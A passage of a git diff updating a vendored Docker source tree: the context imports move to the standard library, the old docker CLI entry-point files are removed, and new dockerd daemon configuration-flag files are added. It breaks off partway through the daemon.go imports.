@@ -12,7 +13,6 @@ import (
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	volumetypes "github.com/docker/docker/api/types/volume"
-	"golang.org/x/net/context"
 )
 
 func TestVolumeListError(t *testing.T) {
@@ -69,7 +69,7 @@ func TestVolumeList(t *testing.T) {
 				if actualFilters != listCase.expectedFilters {
 					return nil, fmt.Errorf("filters not set in URL query properly. Expected '%s', got %s", listCase.expectedFilters, actualFilters)
 				}
-				content, err := json.Marshal(volumetypes.VolumesListOKBody{
+				content, err := json.Marshal(volumetypes.VolumeListOKBody{
 					Volumes: []*types.Volume{
 						{
 							Name:   "volume",
diff --git a/vendor/github.com/docker/docker/client/volume_prune.go b/vendor/github.com/docker/docker/client/volume_prune.go
index a07e4ce637..70041efed8 100644
--- a/vendor/github.com/docker/docker/client/volume_prune.go
+++ b/vendor/github.com/docker/docker/client/volume_prune.go
@@ -1,12 +1,12 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
 )
 
 // VolumesPrune requests the daemon to delete unused data
@@ -29,7 +29,7 @@ func (cli *Client) VolumesPrune(ctx context.Context, pruneFilters filters.Args)
 	defer ensureReaderClosed(serverResp)
 
 	if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil {
-		return report, fmt.Errorf("Error retrieving disk usage: %v", err)
+		return report, fmt.Errorf("Error retrieving volume prune report: %v", err)
 	}
 
 	return report, nil
diff --git a/vendor/github.com/docker/docker/client/volume_remove.go b/vendor/github.com/docker/docker/client/volume_remove.go
index 6c26575b49..fc5a71d334 100644
--- a/vendor/github.com/docker/docker/client/volume_remove.go
+++ b/vendor/github.com/docker/docker/client/volume_remove.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 
 	"github.com/docker/docker/api/types/versions"
-	"golang.org/x/net/context"
 )
 
 // VolumeRemove removes a volume from the docker host.
@@ -17,5 +17,5 @@ func (cli *Client) VolumeRemove(ctx context.Context, volumeID string, force bool
 	}
 	resp, err := cli.delete(ctx, "/volumes/"+volumeID, query, nil)
 	ensureReaderClosed(resp)
-	return err
+	return wrapResponseError(err, resp, "volume", volumeID)
 }
diff --git a/vendor/github.com/docker/docker/client/volume_remove_test.go b/vendor/github.com/docker/docker/client/volume_remove_test.go
index 1fe657349a..31fb3d71aa 100644
--- a/vendor/github.com/docker/docker/client/volume_remove_test.go
+++ b/vendor/github.com/docker/docker/client/volume_remove_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestVolumeRemoveError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none.go
deleted file mode 100644
index 65f9f37be2..0000000000
--- a/vendor/github.com/docker/docker/cmd/docker/daemon_none.go
+++ /dev/null
@@ -1,27 +0,0 @@
-// +build !daemon
-
-package main
-
-import (
-	"fmt"
-	"runtime"
-	"strings"
-
-	"github.com/spf13/cobra"
-)
-
-func newDaemonCommand() *cobra.Command {
-	return &cobra.Command{
-		Use:    "daemon",
-		Hidden: true,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runDaemon()
-		},
-	}
-}
-
-func runDaemon() error {
-	return fmt.Errorf(
-		"`docker daemon` is not supported on %s. Please run `dockerd` directly",
-		strings.Title(runtime.GOOS))
-}
diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go
deleted file mode 100644
index 32032fe1b3..0000000000
--- a/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go
+++ /dev/null
@@ -1,17 +0,0 @@
-// +build !daemon
-
-package main
-
-import (
-	"testing"
-
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestDaemonCommand(t *testing.T) {
-	cmd := newDaemonCommand()
-	cmd.SetArgs([]string{"--help"})
-	err := cmd.Execute()
-
-	assert.Error(t, err, "Please run `dockerd`")
-}
diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go
deleted file mode 100644
index 26348a8843..0000000000
--- a/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go
+++ /dev/null
@@ -1,30 +0,0 @@
-// +build daemon
-
-package main
-
-import (
-	"testing"
-
-	"github.com/docker/docker/pkg/testutil/assert"
-	"github.com/spf13/cobra"
-)
-
-func stubRun(cmd *cobra.Command, args []string) error {
-	return nil
-}
-
-func TestDaemonCommandHelp(t *testing.T) {
-	cmd := newDaemonCommand()
-	cmd.RunE = stubRun
-	cmd.SetArgs([]string{"--help"})
-	err := cmd.Execute()
-	assert.NilError(t, err)
-}
-
-func TestDaemonCommand(t *testing.T) {
-	cmd := newDaemonCommand()
-	cmd.RunE = stubRun
-	cmd.SetArgs([]string{"--containerd", "/foo"})
-	err := cmd.Execute()
-	assert.NilError(t, err)
-}
diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go
deleted file mode 100644
index f68d220c2f..0000000000
--- a/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go
+++ /dev/null
@@ -1,79 +0,0 @@
-// +build daemon
-
-package main
-
-import (
-	"fmt"
-
-	"os"
-	"os/exec"
-	"path/filepath"
-	"syscall"
-
-	"github.com/spf13/cobra"
-)
-
-const daemonBinary = "dockerd"
-
-func newDaemonCommand() *cobra.Command {
-	cmd := &cobra.Command{
-		Use:                "daemon",
-		Hidden:             true,
-		Args:               cobra.ArbitraryArgs,
-		DisableFlagParsing: true,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runDaemon()
-		},
-		Deprecated: "and will be removed in Docker 1.16. Please run `dockerd` directly.",
-	}
-	cmd.SetHelpFunc(helpFunc)
-	return cmd
-}
-
-// CmdDaemon execs dockerd with the same flags
-func runDaemon() error {
-	// Use os.Args[1:] so that "global" args are passed to dockerd
-	return execDaemon(stripDaemonArg(os.Args[1:]))
-}
-
-func execDaemon(args []string) error {
-	binaryPath, err := findDaemonBinary()
-	if err != nil {
-		return err
-	}
-
-	return syscall.Exec(
-		binaryPath,
-		append([]string{daemonBinary}, args...),
-		os.Environ())
-}
-
-func helpFunc(cmd *cobra.Command, args []string) {
-	if err := execDaemon([]string{"--help"}); err != nil {
-		fmt.Fprintf(os.Stderr, "%s\n", err.Error())
-	}
-}
-
-// findDaemonBinary looks for the path to the dockerd binary starting with
-// the directory of the current executable (if one exists) and followed by $PATH
-func findDaemonBinary() (string, error) {
-	execDirname := filepath.Dir(os.Args[0])
-	if execDirname != "" {
-		binaryPath := filepath.Join(execDirname, daemonBinary)
-		if _, err := os.Stat(binaryPath); err == nil {
-			return binaryPath, nil
-		}
-	}
-
-	return exec.LookPath(daemonBinary)
-}
-
-// stripDaemonArg removes the `daemon` argument from the list
-func stripDaemonArg(args []string) []string {
-	for i, arg := range args {
-		if arg == "daemon" {
-			return append(args[:i], args[i+1:]...)
-		}
-	}
-	return args
-}
diff --git a/vendor/github.com/docker/docker/cmd/docker/docker.go b/vendor/github.com/docker/docker/cmd/docker/docker.go
deleted file mode 100644
index d4847a90ee..0000000000
--- a/vendor/github.com/docker/docker/cmd/docker/docker.go
+++ /dev/null
@@ -1,180 +0,0 @@
-package main
-
-import (
-	"errors"
-	"fmt"
-	"os"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types/versions"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/commands"
-	cliflags "github.com/docker/docker/cli/flags"
-	"github.com/docker/docker/cliconfig"
-	"github.com/docker/docker/dockerversion"
-	"github.com/docker/docker/pkg/term"
-	"github.com/docker/docker/utils"
-	"github.com/spf13/cobra"
-	"github.com/spf13/pflag"
-)
-
-func newDockerCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := cliflags.NewClientOptions()
-	var flags *pflag.FlagSet
-
-	cmd := &cobra.Command{
-		Use:              "docker [OPTIONS] COMMAND [ARG...]",
-		Short:            "A self-sufficient runtime for containers",
-		SilenceUsage:     true,
-		SilenceErrors:    true,
-		TraverseChildren: true,
-		Args:             noArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			if opts.Version {
-				showVersion()
-				return nil
-			}
-			return dockerCli.ShowHelp(cmd, args)
-		},
-		PersistentPreRunE: func(cmd *cobra.Command, args []string) error {
-			// daemon command is special, we redirect directly to another binary
-			if cmd.Name() == "daemon" {
-				return nil
-			}
-			// flags must be the top-level command flags, not cmd.Flags()
-			opts.Common.SetDefaultOptions(flags)
-			dockerPreRun(opts)
-			if err := dockerCli.Initialize(opts); err != nil {
-				return err
-			}
-			return isSupported(cmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental())
-		},
-	}
-	cli.SetupRootCommand(cmd)
-
-	cmd.SetHelpFunc(func(ccmd *cobra.Command, args []string) {
-		if dockerCli.Client() == nil { // when using --help, PersistenPreRun is not called, so initialization is needed.
-			// flags must be the top-level command flags, not cmd.Flags()
-			opts.Common.SetDefaultOptions(flags)
-			dockerPreRun(opts)
-			dockerCli.Initialize(opts)
-		}
-
-		if err := isSupported(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental()); err != nil {
-			ccmd.Println(err)
-			return
-		}
-
-		hideUnsupportedFeatures(ccmd, dockerCli.Client().ClientVersion(), dockerCli.HasExperimental())
-
-		if err := ccmd.Help(); err != nil {
-			ccmd.Println(err)
-		}
-	})
-
-	flags = cmd.Flags()
-	flags.BoolVarP(&opts.Version, "version", "v", false, "Print version information and quit")
-	flags.StringVar(&opts.ConfigDir, "config", cliconfig.ConfigDir(), "Location of client config files")
-	opts.Common.InstallFlags(flags)
-
-	cmd.SetOutput(dockerCli.Out())
-	cmd.AddCommand(newDaemonCommand())
-	commands.AddCommands(cmd, dockerCli)
-
-	return cmd
-}
-
-func noArgs(cmd *cobra.Command, args []string) error {
-	if len(args) == 0 {
-		return nil
-	}
-	return fmt.Errorf(
-		"docker: '%s' is not a docker command.\nSee 'docker --help'", args[0])
-}
-
-func main() {
-	// Set terminal emulation based on platform as required.
-	stdin, stdout, stderr := term.StdStreams()
-	logrus.SetOutput(stderr)
-
-	dockerCli := command.NewDockerCli(stdin, stdout, stderr)
-	cmd := newDockerCommand(dockerCli)
-
-	if err := cmd.Execute(); err != nil {
-		if sterr, ok := err.(cli.StatusError); ok {
-			if sterr.Status != "" {
-				fmt.Fprintln(stderr, sterr.Status)
-			}
-			// StatusError should only be used for errors, and all errors should
-			// have a non-zero exit status, so never exit with 0
-			if sterr.StatusCode == 0 {
-				os.Exit(1)
-			}
-			os.Exit(sterr.StatusCode)
-		}
-		fmt.Fprintln(stderr, err)
-		os.Exit(1)
-	}
-}
-
-func showVersion() {
-	fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit)
-}
-
-func dockerPreRun(opts *cliflags.ClientOptions) {
-	cliflags.SetLogLevel(opts.Common.LogLevel)
-
-	if opts.ConfigDir != "" {
-		cliconfig.SetConfigDir(opts.ConfigDir)
-	}
-
-	if opts.Common.Debug {
-		utils.EnableDebug()
-	}
-}
-
-func hideUnsupportedFeatures(cmd *cobra.Command, clientVersion string, hasExperimental bool) {
-	cmd.Flags().VisitAll(func(f *pflag.Flag) {
-		// hide experimental flags
-		if !hasExperimental {
-			if _, ok := f.Annotations["experimental"]; ok {
-				f.Hidden = true
-			}
-		}
-
-		// hide flags not supported by the server
-		if flagVersion, ok := f.Annotations["version"]; ok && len(flagVersion) == 1 && versions.LessThan(clientVersion, flagVersion[0]) {
-			f.Hidden = true
-		}
-
-	})
-
-	for _, subcmd := range cmd.Commands() {
-		// hide experimental subcommands
-		if !hasExperimental {
-			if _, ok := subcmd.Tags["experimental"]; ok {
-				subcmd.Hidden = true
-			}
-		}
-
-		// hide subcommands not supported by the server
-		if subcmdVersion, ok := subcmd.Tags["version"]; ok && versions.LessThan(clientVersion, subcmdVersion) {
-			subcmd.Hidden = true
-		}
-	}
-}
-
-func isSupported(cmd *cobra.Command, clientVersion string, hasExperimental bool) error {
-	if !hasExperimental {
-		if _, ok := cmd.Tags["experimental"]; ok {
-			return errors.New("only supported with experimental daemon")
-		}
-	}
-
-	if cmdVersion, ok := cmd.Tags["version"]; ok && versions.LessThan(clientVersion, cmdVersion) {
-		return fmt.Errorf("only supported with daemon version >= %s", cmdVersion)
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_test.go b/vendor/github.com/docker/docker/cmd/docker/docker_test.go
deleted file mode 100644
index 8738f6005d..0000000000
--- a/vendor/github.com/docker/docker/cmd/docker/docker_test.go
+++ /dev/null
@@ -1,32 +0,0 @@
-package main
-
-import (
-	"io/ioutil"
-	"os"
-	"testing"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/testutil/assert"
-	"github.com/docker/docker/utils"
-)
-
-func TestClientDebugEnabled(t *testing.T) {
-	defer utils.DisableDebug()
-
-	cmd := newDockerCommand(&command.DockerCli{})
-	cmd.Flags().Set("debug", "true")
-
-	err := cmd.PersistentPreRunE(cmd, []string{})
-	assert.NilError(t, err)
-	assert.Equal(t, os.Getenv("DEBUG"), "1")
-	assert.Equal(t, logrus.GetLevel(), logrus.DebugLevel)
-}
-
-func TestExitStatusForInvalidSubcommandWithHelpFlag(t *testing.T) {
-	discard := ioutil.Discard
-	cmd := newDockerCommand(command.NewDockerCli(os.Stdin, discard, discard))
-	cmd.SetArgs([]string{"help", "invalid"})
-	err := cmd.Execute()
-	assert.Error(t, err, "unknown help topic: invalid")
-}
diff --git a/vendor/github.com/docker/docker/cmd/docker/docker_windows.go b/vendor/github.com/docker/docker/cmd/docker/docker_windows.go
deleted file mode 100644
index 9bc507e20c..0000000000
--- a/vendor/github.com/docker/docker/cmd/docker/docker_windows.go
+++ /dev/null
@@ -1,18 +0,0 @@
-package main
-
-import (
-	"sync/atomic"
-
-	_ "github.com/docker/docker/autogen/winresources/docker"
-)
-
-//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll"
-
-var dummy uintptr
-
-func init() {
-	// Ensure that this import is not removed by the linker. This is used to
-	// ensure that shell32.dll is loaded by the system loader, preventing
-	// go#15286 from triggering on Nano Server TP5.
-	atomic.LoadUintptr(&dummy)
-}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config.go b/vendor/github.com/docker/docker/cmd/dockerd/config.go
new file mode 100644
index 0000000000..abdac9a7fb
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/config.go
@@ -0,0 +1,99 @@
+package main
+
+import (
+	"runtime"
+
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/registry"
+	"github.com/spf13/pflag"
+)
+
+const (
+	// defaultShutdownTimeout is the default shutdown timeout for the daemon
+	defaultShutdownTimeout = 15
+	// defaultTrustKeyFile is the default filename for the trust key
+	defaultTrustKeyFile = "key.json"
+)
+
+// installCommonConfigFlags adds flags to the pflag.FlagSet to configure the daemon
+func installCommonConfigFlags(conf *config.Config, flags *pflag.FlagSet) {
+	var maxConcurrentDownloads, maxConcurrentUploads int
+
+	installRegistryServiceFlags(&conf.ServiceOptions, flags)
+
+	flags.Var(opts.NewNamedListOptsRef("storage-opts", &conf.GraphOptions, nil), "storage-opt", "Storage driver options")
+	flags.Var(opts.NewNamedListOptsRef("authorization-plugins", &conf.AuthorizationPlugins, nil), "authorization-plugin", "Authorization plugins to load")
+	flags.Var(opts.NewNamedListOptsRef("exec-opts", &conf.ExecOptions, nil), "exec-opt", "Runtime execution options")
+	flags.StringVarP(&conf.Pidfile, "pidfile", "p", defaultPidFile, "Path to use for daemon PID file")
+	flags.StringVarP(&conf.Root, "graph", "g", defaultDataRoot, "Root of the Docker runtime")
+	flags.StringVar(&conf.ExecRoot, "exec-root", defaultExecRoot, "Root directory for execution state files")
+	flags.StringVar(&conf.ContainerdAddr, "containerd", "", "containerd grpc address")
+
+	// "--graph" is "soft-deprecated" in favor of "data-root". This flag was added
+	// before Docker 1.0, so won't be removed, only hidden, to discourage its usage.
+	flags.MarkHidden("graph")
+
+	flags.StringVar(&conf.Root, "data-root", defaultDataRoot, "Root directory of persistent Docker state")
+
+	flags.BoolVarP(&conf.AutoRestart, "restart", "r", true, "--restart on the daemon has been deprecated in favor of --restart policies on docker run")
+	flags.MarkDeprecated("restart", "Please use a restart policy on docker run")
+
+	// Windows doesn't support setting the storage driver - there is no choice as to which ones to use.
+	if runtime.GOOS != "windows" {
+		flags.StringVarP(&conf.GraphDriver, "storage-driver", "s", "", "Storage driver to use")
+	}
+
+	flags.IntVar(&conf.Mtu, "mtu", 0, "Set the containers network MTU")
+	flags.BoolVar(&conf.RawLogs, "raw-logs", false, "Full timestamps without ANSI coloring")
+	flags.Var(opts.NewListOptsRef(&conf.DNS, opts.ValidateIPAddress), "dns", "DNS server to use")
+	flags.Var(opts.NewNamedListOptsRef("dns-opts", &conf.DNSOptions, nil), "dns-opt", "DNS options to use")
+	flags.Var(opts.NewListOptsRef(&conf.DNSSearch, opts.ValidateDNSSearch), "dns-search", "DNS search domains to use")
+	flags.Var(opts.NewNamedListOptsRef("labels", &conf.Labels, opts.ValidateLabel), "label", "Set key=value labels to the daemon")
+	flags.StringVar(&conf.LogConfig.Type, "log-driver", "json-file", "Default driver for container logs")
+	flags.Var(opts.NewNamedMapOpts("log-opts", conf.LogConfig.Config, nil), "log-opt", "Default log driver options for containers")
+	flags.StringVar(&conf.ClusterAdvertise, "cluster-advertise", "", "Address or interface name to advertise")
+	flags.StringVar(&conf.ClusterStore, "cluster-store", "", "URL of the distributed storage backend")
+	flags.Var(opts.NewNamedMapOpts("cluster-store-opts", conf.ClusterOpts, nil), "cluster-store-opt", "Set cluster store options")
+	flags.StringVar(&conf.CorsHeaders, "api-cors-header", "", "Set CORS headers in the Engine API")
+	flags.IntVar(&maxConcurrentDownloads, "max-concurrent-downloads", config.DefaultMaxConcurrentDownloads, "Set the max concurrent downloads for each pull")
+	flags.IntVar(&maxConcurrentUploads, "max-concurrent-uploads", config.DefaultMaxConcurrentUploads, "Set the max concurrent uploads for each push")
+	flags.IntVar(&conf.ShutdownTimeout, "shutdown-timeout", defaultShutdownTimeout, "Set the default shutdown timeout")
+	flags.IntVar(&conf.NetworkDiagnosticPort, "network-diagnostic-port", 0, "TCP port number of the network diagnostic server")
+	flags.MarkHidden("network-diagnostic-port")
+
+	flags.StringVar(&conf.SwarmDefaultAdvertiseAddr, "swarm-default-advertise-addr", "", "Set default address or interface for swarm advertised address")
+	flags.BoolVar(&conf.Experimental, "experimental", false, "Enable experimental features")
+
+	flags.StringVar(&conf.MetricsAddress, "metrics-addr", "", "Set default address and port to serve the metrics api on")
+
+	flags.Var(opts.NewNamedListOptsRef("node-generic-resources", &conf.NodeGenericResources, opts.ValidateSingleGenericResource), "node-generic-resource", "Advertise user-defined resource")
+
+	flags.IntVar(&conf.NetworkControlPlaneMTU, "network-control-plane-mtu", config.DefaultNetworkMtu, "Network Control plane MTU")
+
+	// "--deprecated-key-path" is to allow configuration of the key used
+	// for the daemon ID and the deprecated image signing. It was never
+	// exposed as a command line option but is added here to allow
+	// overriding the default path in configuration.
+	flags.Var(opts.NewQuotedString(&conf.TrustKeyPath), "deprecated-key-path", "Path to key file for ID and image signing")
+	flags.MarkHidden("deprecated-key-path")
+
+	conf.MaxConcurrentDownloads = &maxConcurrentDownloads
+	conf.MaxConcurrentUploads = &maxConcurrentUploads
+}
+
+func installRegistryServiceFlags(options *registry.ServiceOptions, flags *pflag.FlagSet) {
+	ana := opts.NewNamedListOptsRef("allow-nondistributable-artifacts", &options.AllowNondistributableArtifacts, registry.ValidateIndexName)
+	mirrors := opts.NewNamedListOptsRef("registry-mirrors", &options.Mirrors, registry.ValidateMirror)
+	insecureRegistries := opts.NewNamedListOptsRef("insecure-registries", &options.InsecureRegistries, registry.ValidateIndexName)
+
+	flags.Var(ana, "allow-nondistributable-artifacts", "Allow push of nondistributable artifacts to registry")
+	flags.Var(mirrors, "registry-mirror", "Preferred Docker registry mirror")
+	flags.Var(insecureRegistries, "insecure-registry", "Enable insecure registry communication")
+
+	if runtime.GOOS != "windows" {
+		// TODO: Remove this flag after 3 release cycles (18.03)
+		flags.BoolVar(&options.V2Only, "disable-legacy-registry", true, "Disable contacting legacy registries")
+		flags.MarkHidden("disable-legacy-registry")
+	}
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go
new file mode 100644
index 0000000000..febf30ae9f
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/config_common_unix.go
@@ -0,0 +1,34 @@
+// +build linux freebsd
+
+package main
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/pflag"
+)
+
+var (
+	defaultPidFile  = "/var/run/docker.pid"
+	defaultDataRoot = "/var/lib/docker"
+	defaultExecRoot = "/var/run/docker"
+)
+
+// installUnixConfigFlags adds command-line options to the top-level flag parser for
+// the current process that are common across Unix platforms.
+func installUnixConfigFlags(conf *config.Config, flags *pflag.FlagSet) {
+	conf.Runtimes = make(map[string]types.Runtime)
+
+	flags.StringVarP(&conf.SocketGroup, "group", "G", "docker", "Group for the unix socket")
+	flags.StringVar(&conf.BridgeConfig.IP, "bip", "", "Specify network bridge IP")
+	flags.StringVarP(&conf.BridgeConfig.Iface, "bridge", "b", "", "Attach containers to a network bridge")
+	flags.StringVar(&conf.BridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs")
+	flags.Var(opts.NewIPOpt(&conf.BridgeConfig.DefaultGatewayIPv4, ""), "default-gateway", "Container default gateway IPv4 address")
+	flags.Var(opts.NewIPOpt(&conf.BridgeConfig.DefaultGatewayIPv6, ""), "default-gateway-v6", "Container default gateway IPv6 address")
+	flags.BoolVar(&conf.BridgeConfig.InterContainerCommunication, "icc", true, "Enable inter-container communication")
+	flags.Var(opts.NewIPOpt(&conf.BridgeConfig.DefaultIP, "0.0.0.0"), "ip", "Default IP when binding container ports")
+	flags.Var(opts.NewNamedRuntimeOpt("runtimes", &conf.Runtimes, config.StockRuntimeName), "add-runtime", "Register an additional OCI compatible runtime")
+	flags.StringVar(&conf.DefaultRuntime, "default-runtime", config.StockRuntimeName, "Default OCI runtime for containers")
+
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/config_unix.go
new file mode 100644
index 0000000000..2dbd84b1db
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/config_unix.go
@@ -0,0 +1,50 @@
+// +build linux freebsd
+
+package main
+
+import (
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/opts"
+	"github.com/docker/go-units"
+	"github.com/spf13/pflag"
+)
+
+// installConfigFlags adds flags to the pflag.FlagSet to configure the daemon
+func installConfigFlags(conf *config.Config, flags *pflag.FlagSet) {
+	// First handle install flags which are consistent cross-platform
+	installCommonConfigFlags(conf, flags)
+
+	// Then install flags common to unix platforms
+	installUnixConfigFlags(conf, flags)
+
+	conf.Ulimits = make(map[string]*units.Ulimit)
+	conf.NetworkConfig.DefaultAddressPools = opts.PoolsOpt{}
+
+	// Set default value for `--default-shm-size`
+	conf.ShmSize = opts.MemBytes(config.DefaultShmSize)
+
+	// Then platform-specific install flags
+	flags.BoolVar(&conf.EnableSelinuxSupport, "selinux-enabled", false, "Enable selinux support")
+	flags.Var(opts.NewNamedUlimitOpt("default-ulimits", &conf.Ulimits), "default-ulimit", "Default ulimits for containers")
+	flags.BoolVar(&conf.BridgeConfig.EnableIPTables, "iptables", true, "Enable addition of iptables rules")
+	flags.BoolVar(&conf.BridgeConfig.EnableIPForward, "ip-forward", true, "Enable net.ipv4.ip_forward")
+	flags.BoolVar(&conf.BridgeConfig.EnableIPMasq, "ip-masq", true, "Enable IP masquerading")
+	flags.BoolVar(&conf.BridgeConfig.EnableIPv6, "ipv6", false, "Enable IPv6 networking")
+	flags.StringVar(&conf.BridgeConfig.FixedCIDRv6, "fixed-cidr-v6", "", "IPv6 subnet for fixed IPs")
+	flags.BoolVar(&conf.BridgeConfig.EnableUserlandProxy, "userland-proxy", true, "Use userland proxy for loopback traffic")
+	flags.StringVar(&conf.BridgeConfig.UserlandProxyPath, "userland-proxy-path", "", "Path to the userland proxy binary")
+	flags.StringVar(&conf.CgroupParent, "cgroup-parent", "", "Set parent cgroup for all containers")
+	flags.StringVar(&conf.RemappedRoot, "userns-remap", "", "User/Group setting for user namespaces")
+	flags.BoolVar(&conf.LiveRestoreEnabled, "live-restore", false, "Enable live restore of docker when containers are still running")
+	flags.IntVar(&conf.OOMScoreAdjust, "oom-score-adjust", -500, "Set the oom_score_adj for the daemon")
+	flags.BoolVar(&conf.Init, "init", false, "Run an init in the container to forward signals and reap processes")
+	flags.StringVar(&conf.InitPath, "init-path", "", "Path to the docker-init binary")
+	flags.Int64Var(&conf.CPURealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds")
+	flags.Int64Var(&conf.CPURealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds")
+	flags.StringVar(&conf.SeccompProfile, "seccomp-profile", "", "Path to seccomp profile")
+	flags.Var(&conf.ShmSize, "default-shm-size", "Default shm size for containers")
+	flags.BoolVar(&conf.NoNewPrivileges, "no-new-privileges", false, "Set no-new-privileges by default for new containers")
+	flags.StringVar(&conf.IpcMode, "default-ipc-mode", config.DefaultIpcMode, `Default mode for containers ipc ("shareable" | "private")`)
+	flags.Var(&conf.NetworkConfig.DefaultAddressPools, "default-address-pool", "Default address pools for node specific local networks")
+
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go b/vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go
new file mode 100644
index 0000000000..d7dbf4b4cc
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/config_unix_test.go
@@ -0,0 +1,23 @@
+// +build linux freebsd
+
+package main
+
+import (
+	"testing"
+
+	"github.com/docker/docker/daemon/config"
+	"github.com/spf13/pflag"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestDaemonParseShmSize(t *testing.T) {
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+
+	conf := &config.Config{}
+	installConfigFlags(conf, flags)
+	// By default `--default-shm-size=64M`
+	assert.Check(t, is.Equal(int64(64*1024*1024), conf.ShmSize.Value()))
+	assert.Check(t, flags.Set("default-shm-size", "128M"))
+	assert.Check(t, is.Equal(int64(128*1024*1024), conf.ShmSize.Value()))
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/config_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/config_windows.go
new file mode 100644
index 0000000000..36af76645f
--- /dev/null
+++ b/vendor/github.com/docker/docker/cmd/dockerd/config_windows.go
@@ -0,0 +1,26 @@
+package main
+
+import (
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/daemon/config"
+	"github.com/spf13/pflag"
+)
+
+var (
+	defaultPidFile  string
+	defaultDataRoot = filepath.Join(os.Getenv("programdata"), "docker")
+	defaultExecRoot = filepath.Join(os.Getenv("programdata"), "docker", "exec-root")
+)
+
+// installConfigFlags adds flags to the pflag.FlagSet to configure the daemon
+func installConfigFlags(conf *config.Config, flags *pflag.FlagSet) {
+	// First handle install flags which are consistent cross-platform
+	installCommonConfigFlags(conf, flags)
+
+	// Then platform-specific install flags.
+	flags.StringVar(&conf.BridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs")
+	flags.StringVarP(&conf.BridgeConfig.Iface, "bridge", "b", "", "Attach containers to a virtual switch")
+	flags.StringVarP(&conf.SocketGroup, "group", "G", "", "Users or groups that can access the named pipe")
+}
diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go
index 2f099e0199..efefaa1ac3 100644
--- a/vendor/github.com/docker/docker/cmd/dockerd/daemon.go
+++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon.go
@@ -1,60 +1,63 @@
 package main
 
 import (
+	"context"
 	"crypto/tls"
 	"fmt"
-	"io"
 	"os"
 	"path/filepath"
 	"runtime"
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution/uuid"
 	"github.com/docker/docker/api"
 	apiserver "github.com/docker/docker/api/server"
+	buildbackend "github.com/docker/docker/api/server/backend/build"
 	"github.com/docker/docker/api/server/middleware"
 	"github.com/docker/docker/api/server/router"
 	"github.com/docker/docker/api/server/router/build"
 	checkpointrouter "github.com/docker/docker/api/server/router/checkpoint"
 	"github.com/docker/docker/api/server/router/container"
+	distributionrouter "github.com/docker/docker/api/server/router/distribution"
 	"github.com/docker/docker/api/server/router/image"
 	"github.com/docker/docker/api/server/router/network"
 	pluginrouter "github.com/docker/docker/api/server/router/plugin"
+	sessionrouter "github.com/docker/docker/api/server/router/session"
 	swarmrouter "github.com/docker/docker/api/server/router/swarm"
